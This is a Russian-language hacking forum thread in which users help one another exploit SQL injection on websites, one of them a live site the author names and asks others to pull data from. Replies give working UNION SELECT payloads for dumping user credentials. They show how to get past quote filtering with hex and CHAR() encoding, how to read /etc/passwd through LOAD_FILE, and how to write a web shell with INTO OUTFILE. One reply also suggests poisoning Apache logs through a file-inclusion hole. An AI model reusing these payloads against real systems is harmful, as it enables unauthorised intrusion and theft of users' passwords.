Как быть?(MySQL)

Вообщем всем привет, есть пару вопросов очень надеюсь на вашу помощь…
Имеем к примеру SQL-inj на сайте типа:
bagsql.ru/index.php?id=-1+union+select+1,2,3/*
Выводится 2-ечка, есть возможность посмотреть VERSION() USER() и т.д, но фильтруются символы, пробовал CHAR() текст выводится , но вопрос заключается в том что я 100% уверен что там есть таблица users в которой присутствуют usid, email, usname, uspwd дак вот составляя такой вот запрос:
bagsql.ru/index.php?id=-1+union+select+1,usname,3+from+users/*
Получаю ошибку… Мне кажется что это из-за фильтра… хотя хз… Посоветуйте как быть, PlizZZe.
Ещё возник один вопросик, если я не могу выполнить LOAD_FILE() //пробовал даже кодировать через CHAR(), то выполнится ли OUTFILE? И можно ли тоже использовать кодирование?
И на последок малёк ОФФтоп. Есть инкулуд, могу читать passwd, нет прав на shadow, куда ещё можно залезть для поиска хешей? Если не трудно то напишите плиз пути.
//Слышал что можно в логах нарыть пассы, реально ли?
Всем спасибо, кто чем поможет, с меня репа.

 

Code:

http://www.bagsql.ru/index.php?id=-1+union+select+1,concat_ws(0x3b,usid,email,usname,uspwd)+from+mysql.users+limit+1,1/*

Экранирование кавычек - маленький шанс что зальешь шелл т.к. указать путь будет очень сложно =\

 

Isis, concat_ws(0x3b,usid,email,usname, uspwd) и mysql.users :-| ?

 

2 автор: может ссылку норм дашь?

т.е. цифры выводятся, символы - нет
может проблема в кодировке?
bagsql.ru/index.php?id=-1+union+select+1,convert(usname+using+cp1251),3+from+users/*]
вместо cp1251 - кодировка.

 

либо поуниверсальнее можешь ввести

bagsql.ru/index.php?id=-1+union+select+1,aes_decrypt(aes_encrypt(usname,0x55),0x55),3+from+users/*

или как nitrox говорит.

 

попробуй проинклудить логи апача, предварительно нужно послать запрос на сервер, тема уже поднималась

 

Ссылку в студию. Sql иньекция- такая вещь, с которй надо работать на месте, разбиратся с конкретным случаем

 

Isis насчет кавчек бред =))

если есть файл прив, то нас спасает кодирование в base64

то есть у нас есть LOAD_FILE('/etc/passwd'), кодируем /etc/passwd И получаем 2f 65 74 63 2f 70 61 73 73 77 64, то бишь LOAD_FILE(0x2f6574632f706173737764)

также поступаем во всех местах где юзаются кавычки.. например запрос ..
./index.php?id=-31337+union+select+username,2,3,4,5+from+users+where+group='admin'/*

опять же admin = 61 64 6d 69 6e

./index.php?id=-31337+union+select+username,2,3,4,5+from+users+where+group=0x61646d696e/*

и тд..

 

br, как ты укажешь путь в base64?
Например

Code:

select+1,2+from+mysql.users+into+outfile+'/home/usr1/www/'/*

Как ты здесь путь в base64 декодируешь??Нифига не получиться =)

 

Какой еще бэйсшиссятчитыре , это хекс

 

Outfile/dumpfile требует указания имени файла ТОЛЬКО в ковычках

 

Во-первых: не base64, a hex.
Во-вторых:

Code:

select+1,2+from+mysql.users+into+outfile+0x2f686f6d652f757372312f7777772f /*

У мну на пятом мускуле при задании outfile таким образом отработало на ура.

 

Спасиб, узнал много интересного, но это для общего развития, на самом деле там был приведён простой банальный пример, в котором я показал проблемы с которыми столкнулся, т.е реальный сайтик имеет MySQL-inj но она не видимая вот собственно линк где всё можно увидеть сомаму
http://333.by/newsdet.php?nid=2+and+1=0+union+select+1,2,3,VERSION(),5,6,7,8,9,10/*
Если кто сможет что-нить реальное вытянуть отпишите плиз в личку или сюда. А то я так понимаю этот нюанс спорный и всем будет интересно узнать как же быть.
Ещё до конца не раскрыт вопрос OUTFILE… Но щя попробую за_hex_ить адресок и гляну получится или нет.
ЗЫ: Ni0x, пасиб, нашёл топик щя тож буду пробовать!

 

Здесь нет прав, единственное что можешь сделать это вытянуть логин и пароль админа(если таковой есть) и уже в админке смотреть какие скрипты есть..

 

Если есть привелегии обойти не проблема.

 

Нефига подобного Читай манулалы по 5 скулю.
Пример Helios тебе таму подтвержнеие сам.

 

Это в пятом , я до сих пор в четвертом и мануал по четвертому читал %) Пятая стоит на меньшем кол-ве серверов